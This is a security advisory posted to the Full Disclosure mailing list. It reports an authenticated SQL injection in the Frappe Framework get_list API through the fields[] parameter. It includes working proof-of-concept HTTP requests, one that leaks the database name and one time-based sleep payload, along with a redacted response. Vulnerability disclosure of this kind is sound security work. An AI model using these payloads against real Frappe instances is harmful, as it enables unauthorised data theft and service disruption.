[FD] Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework

Ron E Tue, 27 May 2025 20:21:15 -0700


An authenticated SQL injection vulnerability exists in the 
frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions 
v15.56.1. The vulnerability stems from improper sanitization of the fields[] 
parameter, which allows low-privileged users to inject arbitrary SQL 
expressions directly into the SELECT clause.


Sample Structured Query Language Injection:

Request:

GET 
/api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934
 HTTP/2
Host: --host--
Cookie: ******
--snip--

Response:

HTTP/2 200 OK

{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--

Time based attack:

Request

GET 
/api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933
 HTTP/2
Host: --host--
Cookie: ******
--snip--


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework

Reply via email to